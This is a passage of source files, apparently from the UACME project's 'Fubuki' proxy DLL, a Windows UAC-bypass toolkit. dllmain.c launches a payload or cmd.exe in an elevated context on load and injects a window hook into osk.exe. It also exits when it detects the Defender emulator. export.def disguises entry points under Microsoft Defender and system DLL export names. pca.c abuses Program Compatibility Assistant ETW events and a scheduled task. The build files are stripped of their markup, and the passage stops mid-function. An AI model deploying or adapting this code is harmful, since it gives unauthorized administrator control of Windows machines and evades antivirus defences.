/EXPORT:AtlModuleUnregisterServer=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleUnregisterServer,@22\")\n#pragma comment(linker, \" /EXPORT:AtlModuleUnregisterServerEx=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleUnregisterServerEx,@57\")\n#pragma comment(linker, \" /EXPORT:AtlModuleUpdateRegistryFromResourceD=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlModuleUpdateRegistryFromResourceD,@23\")\n#pragma comment(linker, \" /EXPORT:AtlPixelToHiMetric=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlPixelToHiMetric,@28\")\n#pragma comment(linker, \" /EXPORT:AtlRegisterClassCategoriesHelper=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlRegisterClassCategoriesHelper,@49\")\n#pragma comment(linker, \" /EXPORT:AtlSetErrorInfo=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlSetErrorInfo,@25\")\n#pragma comment(linker, \" /EXPORT:AtlSetErrorInfo2=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlSetErrorInfo2,@59\")\n#pragma comment(linker, \" /EXPORT:AtlUnadvise=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlUnadvise,@11\")\n#pragma comment(linker, \" /EXPORT:AtlUnmarshalPtr=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlUnmarshalPtr,@14\")\n#pragma comment(linker, \" /EXPORT:AtlWaitWithMessageLoop=\\\\\\\\?\\\\globalroot\\\\systemroot\\\\system32\\\\atl.AtlWaitWithMessageLoop,@24\")\n"
},
{
"path": "Source/Fubuki/dll.vcxproj",
"content": "\n\n \n \n Debug\n Win32\n \n \n Debug\n x64\n \n \n ReleaseInternal\n Win32\n \n \n ReleaseInternal\n x64\n \n \n Release\n Win32\n \n \n Release\n x64\n \n \n \n {23A2E629-DC9D-46EA-8B5A-F1D60566EA09}\n Win32Proj\n dll\n Fubuki\n 10.0\n \n \n \n DynamicLibrary\n true\n v145\n Unicode\n \n \n DynamicLibrary\n true\n v145\n Unicode\n false\n \n \n DynamicLibrary\n false\n v145\n true\n Unicode\n \n \n DynamicLibrary\n false\n v145\n true\n Unicode\n \n \n DynamicLibrary\n false\n v145\n true\n Unicode\n false\n \n \n DynamicLibrary\n false\n v145\n true\n Unicode\n false\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n true\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n false\n SecurityRules.ruleset\n $(ProjectName)32\n false\n \n \n true\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n $(ProjectName)64\n SecurityRules.ruleset\n false\n \n \n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n true\n AllRules.ruleset\n $(ProjectName)32\n false\n \n \n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n true\n AllRules.ruleset\n $(ProjectName)32\n false\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n $(ProjectName)64\n AllRules.ruleset\n false\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n $(ProjectName)64\n SecurityRules.ruleset\n false\n \n \n \n \n \n Level4\n Disabled\n WIN32;_DEBUG;_WINDOWS;_USRDLL;DLL_EXPORTS;%(PreprocessorDefinitions)\n \n \n Size\n true\n false\n MultiThreadedDLL\n false\n false\n CompileAsC\n $(SolutionDir)\n \n \n Windows\n false\n DllMain\n 6.0\n export.def\n \n \n Shell32.lib;%(AdditionalDependencies)\n \n \n \n \n \n \n Level4\n Disabled\n WIN32;_DEBUG;_WINDOWS;_USRDLL;DLL_EXPORTS;%(PreprocessorDefinitions)\n \n \n false\n CompileAsC\n $(SolutionDir)\n \n \n Windows\n true\n DllMain\n 6.0\n export.def\n Shell32.lib;%(AdditionalDependencies)\n \n \n \n \n Level4\n \n \n MinSpace\n true\n true\n WIN32;NDEBUG;_WINDOWS;_USRDLL;DLL_EXPORTS;%(PreprocessorDefinitions)\n true\n Size\n true\n false\n MultiThreadedDLL\n false\n false\n CompileAsC\n None\n $(SolutionDir)\n \n \n Windows\n true\n true\n DllMain\n true\n 6.0\n export.def\n \n \n Shell32.lib;%(AdditionalDependencies)\n No\n UseLinkTimeCodeGeneration\n \n \n \n \n \n \n \n \n Level4\n \n \n MinSpace\n true\n true\n WIN32;NDEBUG;_WINDOWS;_USRDLL;DLL_EXPORTS;%(PreprocessorDefinitions)\n true\n Size\n true\n false\n MultiThreadedDLL\n false\n false\n CompileAsC\n None\n $(SolutionDir)\n \n \n Windows\n true\n true\n DllMain\n true\n 6.0\n export.def\n \n \n Shell32.lib;%(AdditionalDependencies)\n No\n UseLinkTimeCodeGeneration\n \n \n \\Utils\\StripDebug.exe .\\output\\$(Platform)\\$(Configuration)\\Fubuki32.dll\n \n \n \n \n Level4\n \n \n MinSpace\n true\n true\n WIN32;NDEBUG;_WINDOWS;_USRDLL;DLL_EXPORTS;%(PreprocessorDefinitions)\n true\n Size\n true\n false\n CompileAsC\n $(SolutionDir)\n \n \n Windows\n No\n true\n true\n DllMain\n true\n 6.0\n export.def\n Shell32.lib;%(AdditionalDependencies)\n \n \n \n \n \n \n \n \n Level4\n \n \n MinSpace\n true\n true\n WIN32;NDEBUG;_WINDOWS;_USRDLL;DLL_EXPORTS;%(PreprocessorDefinitions)\n true\n Size\n true\n false\n CompileAsC\n $(SolutionDir)\n \n \n Windows\n No\n true\n true\n DllMain\n true\n 6.0\n export.def\n Shell32.lib;%(AdditionalDependencies)\n \n \n \\Utils\\StripDebug.exe .\\output\\$(Platform)\\$(Configuration)\\Fubuki64.dll\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n"
},
{
"path": "Source/Fubuki/dll.vcxproj.filters",
"content": "\n\n \n \n {4FC737F1-C7A5-4376-A066-2A32D752A2FF}\n cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx\n \n \n {93995380-89BD-4b04-88EB-625FBE52EBFB}\n h;hh;hpp;hxx;hm;inl;inc;xsd\n \n \n {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\n rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms\n \n \n {04ee0fac-8cb1-42ba-8211-a3b0023677db}\n \n \n \n \n Header Files\n \n \n Header Files\n \n \n Header Files\n \n \n minirtl\n \n \n Header Files\n \n \n minirtl\n \n \n Header Files\n \n \n Header Files\n \n \n Header Files\n \n \n Header Files\n \n \n Header Files\n \n \n Header Files\n \n \n \n \n Resource Files\n \n \n \n \n Source Files\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n Source Files\n \n \n minirtl\n \n \n Source Files\n \n \n Source Files\n \n \n Source Files\n \n \n \n \n Source Files\n \n \n"
},
{
"path": "Source/Fubuki/dll.vcxproj.user",
"content": "\n\n \n \n \n WindowsLocalDebugger\n \n"
},
{
"path": "Source/Fubuki/dllmain.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2025\n*\n* TITLE: DLLMAIN.C\n*\n* VERSION: 3.69\n*\n* DATE: 07 Jul 2025\n*\n* Proxy dll entry point.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"fubuki.h\"\n\nUACME_PARAM_BLOCK g_SharedParams;\nHANDLE g_SyncMutant = NULL;\n\n/*\n* DummyFunc\n*\n* Purpose:\n*\n* Stub for fake exports.\n*\n*/\nVOID WINAPI DummyFunc(\n VOID\n)\n{\n}\n\n/*\n* DefaultPayload\n*\n* Purpose:\n*\n* Process parameter if exist or start cmd.exe and exit immediately.\n*\n*/\nVOID DefaultPayload(\n VOID\n)\n{\n BOOL bSharedParamsReadOk;\n UINT ExitCode;\n PWSTR lpParameter;\n ULONG cbParameter;\n\n ucmDbgMsg(LoadedMsg);\n\n //\n // Read shared params block.\n //\n RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));\n bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);\n if (bSharedParamsReadOk) {\n ucmDbgMsg(L\"Fubuki, ucmReadSharedParameters OK\\r\\n\");\n\n lpParameter = g_SharedParams.szParameter;\n cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));\n }\n else {\n ucmDbgMsg(L\"Fubuki, ucmReadSharedParameters Failed\\r\\n\");\n lpParameter = NULL;\n cbParameter = 0UL;\n }\n\n ucmDbgMsg(L\"Fubuki, before ucmLaunchPayload\\r\\n\");\n\n ExitCode = (ucmLaunchPayload(lpParameter, cbParameter) != FALSE);\n\n ucmDbgMsg(L\"Fubuki, after ucmLaunchPayload\\r\\n\");\n if (ExitCode == 0) {\n ucmDbgMsg(L\"Fubuki, ucmLaunchPayload failed\\r\\n\");\n }\n\n //\n // If this is default executable, show runtime info.\n //\n if ((lpParameter == NULL) || (cbParameter == 0)) {\n if (g_SharedParams.AkagiFlag == AKAGI_FLAG_TANGO)\n ucmQueryRuntimeInfo(FALSE);\n }\n\n //\n // Notify Akagi.\n //\n if (bSharedParamsReadOk) {\n ucmDbgMsg(L\"Fubuki, completion\\r\\n\");\n ucmSetCompletion(g_SharedParams.szSignalObject);\n }\n\n RtlExitUserProcess(ExitCode);\n}\n\n/*\n* UiAccessMethodHookProc\n*\n* Purpose:\n*\n* Window hook procedure for UiAccessMethod\n*\n*/\nLRESULT CALLBACK UiAccessMethodHookProc(\n _In_ int nCode,\n _In_ WPARAM wParam,\n _In_ LPARAM lParam\n)\n{\n return CallNextHookEx(NULL, nCode, wParam, lParam);\n}\n\n/*\n* UiAccessMethodPayload\n*\n* Purpose:\n*\n* Defines application context and either:\n* - if fInstallHook set - installs windows hook for dll injection\n* - run default payload in target app context\n*\n*/\nVOID UiAccessMethodPayload(\n _In_ HINSTANCE hinstDLL,\n _In_ BOOL fInstallHook,\n _In_opt_ LPWSTR lpTargetApp\n)\n{\n LPWSTR lpFileName;\n HHOOK hHook;\n HOOKPROC HookProcedure;\n TOKEN_ELEVATION_TYPE TokenType = TokenElevationTypeDefault;\n WCHAR szModuleName[MAX_PATH + 1];\n\n RtlSecureZeroMemory(szModuleName, sizeof(szModuleName));\n if (GetModuleFileName(NULL, szModuleName, MAX_PATH) == 0)\n return;\n\n lpFileName = _filename(szModuleName);\n if (lpFileName == NULL)\n return;\n\n if (fInstallHook) {\n\n //\n // Check if we are in the required application context\n // Are we inside osk.exe?\n //\n if (_strcmpi(lpFileName, TEXT(\"osk.exe\")) == 0) {\n HookProcedure = (HOOKPROC)GetProcAddress(hinstDLL, FUBUKI_WND_HOOKPROC); //UiAccessMethodHookProc\n if (HookProcedure) {\n hHook = SetWindowsHookEx(WH_CALLWNDPROC, HookProcedure, hinstDLL, 0);\n if (hHook) {\n //\n // Timeout to be enough to spawn target app.\n //\n Sleep(15000);\n UnhookWindowsHookEx(hHook);\n }\n }\n RtlExitUserProcess(0);\n }\n }\n\n //\n // If target application name specified - check are we inside target app?\n //\n if (lpTargetApp) {\n if (_strcmpi(lpFileName, lpTargetApp) == 0) {\n DefaultPayload();\n }\n }\n else {\n //\n // Use any suitable elevated context.\n //\n if (ucmGetProcessElevationType(NULL, &TokenType)) {\n if (TokenType == TokenElevationTypeFull) {\n DefaultPayload();\n }\n }\n }\n}\n\n/*\n* UiAccessMethodDllMain\n*\n* Purpose:\n*\n* Proxy dll entry point for uiAccess method.\n* Need dedicated entry point because of additional code.\n*\n*/\nBOOL WINAPI UiAccessMethodDllMain(\n _In_ HINSTANCE hinstDLL,\n _In_ DWORD fdwReason,\n _In_ LPVOID lpvReserved\n)\n{\n WCHAR szMMC[] = { L'm', L'm', L'c', L'.', L'e', L'x', L'e', 0 };\n UNREFERENCED_PARAMETER(lpvReserved);\n\n if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {\n RtlExitUserProcess('foff');\n }\n\n if (fdwReason == DLL_PROCESS_ATTACH) {\n UiAccessMethodPayload(hinstDLL, TRUE, szMMC);\n }\n\n return TRUE;\n}\n\n/*\n* DllMain\n*\n* Purpose:\n*\n* Default proxy dll entry point.\n*\n*/\nBOOL WINAPI DllMain(\n _In_ HINSTANCE hinstDLL,\n _In_ DWORD fdwReason,\n _In_ LPVOID lpvReserved\n)\n{\n UNREFERENCED_PARAMETER(hinstDLL);\n UNREFERENCED_PARAMETER(lpvReserved);\n \n if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {\n RtlExitUserProcess('foff');\n }\n\n if (fdwReason == DLL_PROCESS_ATTACH) {\n DefaultPayload();\n }\n\n return TRUE;\n}\n\n/*\n* EntryPointExeMode\n*\n* Purpose:\n*\n* Entry point to be used in exe mode.\n*\n*/\nVOID WINAPI EntryPointExeMode(\n VOID\n)\n{\n if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {\n RtlExitUserProcess('foff');\n }\n DefaultPayload();\n}\n\n/*\n* EntryPointUIAccessLoader\n*\n* Purpose:\n*\n* Entry point to be used in exe mode.\n*\n*/\nVOID WINAPI EntryPointUIAccessLoader(\n VOID\n)\n{\n ULONG r = 0;\n WCHAR szParam[MAX_PATH * 2];\n\n if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {\n RtlExitUserProcess('foff');\n }\n\n if (GetCommandLineParam(GetCommandLine(), 0, szParam, MAX_PATH, &r)) {\n if (r > 0) {\n ucmUIHackExecute(szParam);\n }\n }\n RtlExitUserProcess(0);\n}\n\n/*\n* EntryPointUIAccessLoader2\n*\n* Purpose:\n*\n* Entry point to be used in exe mode.\n*\n*/\nVOID WINAPI EntryPointUIAccessLoader2(\n VOID\n)\n{\n if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {\n RtlExitUserProcess('foff');\n }\n ucmUIHackExecute2();\n \n RtlExitUserProcess(0);\n}\n\n/*\n* EntryPointSxsConsent\n*\n* Purpose:\n*\n* Entry point to be used by consent sxs method.\n*\n*/\nBOOL WINAPI EntryPointSxsConsent(\n _In_ HINSTANCE hinstDLL,\n _In_ DWORD fdwReason,\n _In_ LPVOID lpvReserved\n)\n{\n BOOL bSharedParamsReadOk;\n PWSTR lpParameter;\n ULONG cbParameter;\n\n UNREFERENCED_PARAMETER(lpvReserved);\n\n ucmDbgMsg(LoadedMsg);\n\n if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED)\n RtlExitUserProcess('foff');\n\n\n if (fdwReason == DLL_PROCESS_ATTACH) {\n\n LdrDisableThreadCalloutsForDll(hinstDLL);\n\n //\n // Read shared params block.\n //\n RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));\n bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);\n if (bSharedParamsReadOk) {\n lpParameter = g_SharedParams.szParameter;\n cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));\n }\n else {\n lpParameter = NULL;\n cbParameter = 0UL;\n }\n\n ucmLaunchPayloadEx(\n CreateProcessW,\n lpParameter,\n cbParameter);\n\n //\n // Notify Akagi.\n //\n if (bSharedParamsReadOk) {\n ucmSetCompletion(g_SharedParams.szSignalObject);\n }\n\n }\n return TRUE;\n}\n\n/*\n* EntryPointBackupLocked\n*\n* Purpose:\n*\n* Entry point to be used by QuickAssist method.\n*\n*/\nBOOL WINAPI EntryPointBackupLocked(\n _In_ HINSTANCE hinstDLL,\n _In_ DWORD fdwReason,\n _In_ LPVOID lpvReserved\n)\n{\n BOOL bSharedParamsReadOk;\n PWSTR lpParameter;\n ULONG cbParameter;\n\n UNREFERENCED_PARAMETER(lpvReserved);\n\n ucmDbgMsg(LoadedMsg);\n\n if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED)\n RtlExitUserProcess('foff');\n\n if (fdwReason == DLL_PROCESS_ATTACH) {\n\n ucmHideMainWindow();\n LdrDisableThreadCalloutsForDll(hinstDLL);\n\n //\n // Read shared params block.\n //\n RtlSecureZeroMemory(&g_SharedParams, sizeof(g_SharedParams));\n bSharedParamsReadOk = ucmReadSharedParameters(&g_SharedParams);\n if (bSharedParamsReadOk) {\n lpParameter = g_SharedParams.szParameter;\n cbParameter = (ULONG)(_strlen(g_SharedParams.szParameter) * sizeof(WCHAR));\n }\n else {\n lpParameter = NULL;\n cbParameter = 0UL;\n }\n\n ucmLaunchPayload3(lpParameter, cbParameter);\n\n //\n // Notify Akagi.\n //\n if (bSharedParamsReadOk) {\n ucmSetCompletion(g_SharedParams.szSignalObject);\n }\n }\n\n return TRUE;\n}\n"
},
{
"path": "Source/Fubuki/export.def",
"content": "EXPORTS\n;DllRegisterServer = DummyFunc PRIVATE\n\n; WOW64LOG\nWow64LogSystemService\t\t= DummyFunc\nWow64LogInitialize\t\t\t= DummyFunc\nWow64LogTerminate\t\t\t= DummyFunc\nWow64LogMessageArgList\t\t= DummyFunc\n\n; COMMCTL\nTaskDialogIndirect = DummyFunc @345\n\n; Main routines\nMpManagerOpen = UiAccessMethodDllMain\nMpHandleClose = UiAccessMethodHookProc\nMpScanStart = EntryPointExeMode\nMpScanControl = EntryPointUIAccessLoader\nMpUpdateEngine = EntryPointUIAccessLoader2\nMpThreatOpen = EntryPointSxsConsent\nMpThreatEnumerate = EntryPointBackupLocked\nMpManagerStatusQuery = pcaEntryPointLoader\nMpManagerStatusQueryEx = pcaEntryPointDll\n\n; MSCOREE.DLL\nClrCreateManagedInstance = DummyFunc\nCorBindToRuntimeEx = DummyFunc\nLoadLibraryShim = DummyFunc\n\n; OSKSUPPORT.DLL\nInitializeOSKSupport = DummyFunc\nUninitializeOSKSupport = DummyFunc\n\n; DUSER.DLL\nInvalidateGadget = DummyFunc\n\n; GDIPLUS\nGdipAlloc = DummyFunc\nGdipCloneImage = DummyFunc\nGdipCreateBitmapFromStream = DummyFunc\nGdipCreateFromHDC = DummyFunc\nGdipCreateHBITMAPFromBitmap = DummyFunc\nGdipCreateLineBrushI = DummyFunc\nGdipCreateSolidFill = DummyFunc\nGdipDeleteBrush = DummyFunc\nGdipDeleteGraphics = DummyFunc\nGdipDisposeImage = DummyFunc\nGdipFillRectangleI = DummyFunc\nGdipFree = DummyFunc\nGdiplusShutdown = DummyFunc\nGdiplusStartup = DummyFunc\n\n; WDI\nWdiDiagnosticModuleMain = WdiStubGeneric\nWdiHandleInstance = WdiStubGeneric\n\nWdiGetDiagnosticModuleInterfaceVersion\n\n; Rest of exports\nMpManagerDisable = DummyFunc\nMpManagerEnable = DummyFunc\nMpManagerVersionQuery = DummyFunc \nMpMemoryScanStart = DummyFunc\nMpGetEngineVersion = DummyFunc\n\n; ISCSIEXE.DLL\n\nSvchostPushServiceGlobals = DummyFunc\nDiscpEstablishServiceLinkage = DummyFunc\nServiceMain = DummyFunc\n"
},
{
"path": "Source/Fubuki/fubuki.h",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2018 - 2023\n*\n* TITLE: FUBUKI.H\n*\n* VERSION: 3.64\n*\n* DATE: 04 Feb 2023\n*\n* Fubuki global include header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#if !defined UNICODE\n#error ANSI build is not supported\n#endif\n\n#include \"shared\\shared.h\"\n#include \"shared\\libinc.h\"\n#include \"shared\\cmdline.h\"\n\n#include \"uihacks.h\"\n#include \"pca.h\"\n\n//\n// Forwards\n//\n#include \"winmm.h\"\n#include \"atldll.h\"\n\n#define LoadedMsg TEXT(\"Fubuki lock and loaded\")\n\n//default execution flow\n#define AKAGI_FLAG_KILO 1\n\n//suppress all additional output\n#define AKAGI_FLAG_TANGO 2\n\nextern UACME_PARAM_BLOCK g_SharedParams;\n"
},
{
"path": "Source/Fubuki/pca.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2021 - 2025\n*\n* TITLE: PCA.C\n*\n* VERSION: 3.69\n*\n* DATE: 07 July 2025\n* \n* Fubuki Program Compatibility Assistant method support code.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"fubuki.h\"\n#include \n#include \n#include \n\n#pragma comment(lib, \"taskschd.lib\")\n\nconst ULONGLONG ZERO_VALUE = 0;\n\n/*\n* WdiGetDiagnosticModuleInterfaceVersion\n*\n* Purpose:\n*\n* Stub for fake WDI exports.\n*\n*/\nULONG_PTR WINAPI WdiGetDiagnosticModuleInterfaceVersion(\n VOID\n)\n{\n return 1;\n}\n\n/*\n* WdiStubGeneric\n*\n* Purpose:\n*\n* Stub for fake WDI exports.\n*\n*/\nHRESULT WINAPI WdiStubGeneric(\n ULONG_PTR UnusedParam1,\n ULONG_PTR UnusedParam2\n)\n{\n UNREFERENCED_PARAMETER(UnusedParam1);\n UNREFERENCED_PARAMETER(UnusedParam2);\n\n return S_OK;\n}\n\n/*\n* ucmxStopTaskByName\n*\n* Purpose:\n*\n* Stop scheduled task by name.\n*\n*/\nBOOL ucmxStopTaskByName(\n _In_ LPCWSTR TaskFolder,\n _In_ LPCWSTR TaskName\n)\n{\n BOOL bResult = FALSE;\n HRESULT hr;\n ITaskService* pService = NULL;\n ITaskFolder* pRootFolder = NULL;\n IRegisteredTask* pTask = NULL;\n TASK_STATE taskState;\n\n BSTR bstrTaskFolder = NULL;\n BSTR bstrTask = NULL;\n VARIANT varDummy;\n\n do {\n\n bstrTaskFolder = SysAllocString(TaskFolder);\n if (bstrTaskFolder == NULL)\n break;\n\n bstrTask = SysAllocString(TaskName);\n if (bstrTask == NULL)\n break;\n\n hr = CoCreateInstance(&CLSID_TaskScheduler,\n NULL,\n CLSCTX_INPROC_SERVER,\n &IID_ITaskService,\n (void**)&pService);\n\n if (FAILED(hr))\n break;\n\n VariantInit(&varDummy);\n\n hr = pService->lpVtbl->Connect(pService,\n varDummy,\n varDummy,\n varDummy,\n varDummy);\n\n if (FAILED(hr))\n break;\n\n hr = pService->lpVtbl->GetFolder(pService, bstrTaskFolder, &pRootFolder);\n if (FAILED(hr))\n break;\n\n hr = pRootFolder->lpVtbl->GetTask(pRootFolder, bstrTask, &pTask);\n if (FAILED(hr))\n break;\n\n hr = pTask->lpVtbl->get_State(pTask, &taskState);\n if (FAILED(hr))\n break;\n\n if (taskState == TASK_STATE_RUNNING) {\n hr = pTask->lpVtbl->Stop(pTask, 0);\n }\n\n bResult = SUCCEEDED(hr);\n\n } while (FALSE);\n\n if (bstrTaskFolder)\n SysFreeString(bstrTaskFolder);\n\n if (bstrTask)\n SysFreeString(bstrTask);\n\n if (pTask)\n pTask->lpVtbl->Release(pTask);\n\n if (pRootFolder)\n pRootFolder->lpVtbl->Release(pRootFolder);\n\n if (pService)\n pService->lpVtbl->Release(pService);\n\n return bResult;\n}\n\n/*\n* pcaEtwCall\n*\n* Purpose:\n*\n* Write ETW events to trigger the PCA process.\n*\n*/\nULONG pcaEtwCall()\n{\n CONST GUID providerGuid = { 0x0EEF54E71, 0x661, 0x422D, {0x9A, 0x98, 0x82, 0xFD, 0x49, 0x40, 0xB8, 0x20} };\n CONST EVENT_DATA_DESCRIPTOR eventUserData[3] = {\n {(UINT_PTR)&ZERO_VALUE, sizeof(ULONG)},\n {(UINT_PTR)&ZERO_VALUE, sizeof(ULONG)},\n {(UINT_PTR)NULL, 0}\n };\n\n EVENT_DESCRIPTOR eventDescriptor;\n ULONG status = 0;\n\n eventDescriptor.Id = 0x1F46;\n eventDescriptor.Version = 0;\n eventDescriptor.Channel = 0x11;\n eventDescriptor.Level = 4;\n eventDescriptor.Opcode = 0;\n eventDescriptor.Task = 0;\n eventDescriptor.Keyword = 0x4000000000000100;\n\n status = EtwEventWriteNoRegistration(\n &providerGuid,\n &eventDescriptor,\n 3,\n (PEVENT_DATA_DESCRIPTOR)&eventUserData);\n\n if (status == ERROR_SUCCESS) {\n\n eventDescriptor.Id = 0x1F48;\n\n status = EtwEventWriteNoRegistration(\n &providerGuid,\n &eventDescriptor,\n 3,\n (PEVENT_DATA_DESCRIPTOR)&eventUserData);\n\n }\n\n return status;\n}\n\n/*\n* pcaStopWDI\n*\n* Purpose:\n*\n* Stop WDI task and exit loader.\n*\n*/\nULONG pcaStopWDI()\n{\n HRESULT hr;\n NTSTATUS ntStatus = STATUS_UNSUCCESSFUL;\n\n ucmDbgMsg(L\"[PCALDR] pcaStopWDI\\r\\n\");\n\n hr = CoInitializeEx(NULL,\n COINIT_APARTMENTTHREADED |\n COINIT_DISABLE_OLE1DDE |\n COINIT_SPEED_OVER_MEMORY);\n\n if (SUCCEEDED(hr)) {\n\n ucmSleep(1000);\n\n if (ucmxStopTaskByName(\n TEXT(\"Microsoft\\\\Windows\\\\WDI\"),\n TEXT(\"ResolutionHost\")))\n {\n ucmDbgMsg(L\"[PCALDR] ucmxStopTaskByName success\\r\\n\");\n ntStatus = STATUS_SUCCESS;\n }\n\n CoUninitialize();\n\n }\n\n return ntStatus;\n}\n\n/*\n* pcaWin7Trigger\n*\n* Purpose:\n*\n* PCA Windows 7 specific trigger method.\n*\n*/\nULONG pcaWin7Trigger(\n VOID\n)\n{\n ucmSleep(2000);\n return 0;\n}\n\n/*\n* pcaEntryPointLoader\n*\n* Purpose:\n*\n* Entry point to be used in exe mode with PCA method ONLY.\n*\n*/\nVOID WINAPI pcaEntryPointLoader(\n VOID)\n{\n ULONG rLen = 0, status = 0;\n LPCWSTR lpCmdline = GetCommandLine();\n WCHAR szLoaderParam[MAX_PATH + 1];\n\n if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {\n RtlExitUserProcess('foff');\n }\n\n RtlSecureZeroMemory(szLoaderParam, sizeof(szLoaderParam));\n GetCommandLineParam(lpCmdline, 0, (LPWSTR)&szLoaderParam, MAX_PATH, &rLen);\n\n if (rLen) {\n\n if (szLoaderParam[0] == TEXT('1')) {\n status = pcaEtwCall();\n }\n else if (szLoaderParam[0] == TEXT('2')) {\n status = pcaStopWDI();\n } else if(szLoaderParam[0] == TEXT('3')) {\n status = pcaWin7Trigger();\n }\n }\n else {\n ucmDbgMsg(L\"[PCALDR] Empty command line\\r\\n\");\n }\n\n RtlExitUserProcess(status);\n}\n\n/*\n* pcaEntryPointDll\n*\n* Purpose:\n*\n* Entry point to be used in dll mode with PCA method ONLY.\n*\n*/\nBOOL WINAPI pcaEntryPointDll(\n _In_ HINSTANCE hinstDLL,\n _In_ DWORD fdwReason,\n _In_ LPVOID lpvReserved\n)\n{\n BOOL bSharedParamsReadOk;\n PWSTR lpParameter;\n ULONG cbParameter;\n\n HANDLE hSharedSection = NULL;\n PCA_LOADER_BLOCK* pvLoaderBlock = NULL;\n\n NTSTATUS ntStatus;\n\n SIZE_T viewSize = PAGE_SIZE;\n\n HANDLE hSharedEvent = NULL;\n WCHAR szObjectName[MAX_PATH];\n WCHAR szName[128];\n WCHAR szLoaderCmdLine[2];\n WCHAR szLoader[MAX_PATH + 1];\n\n UNICODE_STRING usName;\n OBJECT_ATTRIBUTES obja;\n\n PROCESS_INFORMATION processInfo;\n STARTUPINFO startupInfo;\n\n UNREFERENCED_PARAMETER(lpvReserved);\n\n if (wdIsEmulatorPresent() != STATUS_NOT_SUPPORTED) {\n RtlExitUserProcess('f0ff');\n }\n\n if (fdwReason == DLL_PROCESS_ATTACH) {\n\n LdrDisableThreadCalloutsForDll(hinstDLL);\n\n ucmDbgMsg(L\"[PCADLL] Entry\\r\\n\");\n\n RtlSecureZeroMemory(&szName, sizeof(szName));\n ucmGenerateSharedObjectName(FUBUKI_PCA_SECTION_ID, szName);\n\n _strcpy(szObjectName, TEXT(\"\\\\Sessions\\\\\"));\n ultostr(NtCurrentPeb()->SessionId, _strend(szObjectName));\n _strcat(szObjectName, TEXT(\"\\\\BaseNamedObjects\\\\\"));\n _strcat(szObjectName, szName);\n\n RtlInitUnicodeString(&usName, szObjectName);\n InitializeObjectAttributes(&obja, &usName, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\n if (NT_SUCCESS(NtOpenSection(&hSharedSection,\n SECTION_ALL_ACCESS,\n &obja)))\n {\n ntStatus = NtMapViewOfSection(\n hSharedSection,\n NtCurrentProcess(),\n &pvLoaderBlock,\n 0,\n PAGE_SIZE,\n NULL,\n &viewSize,\n 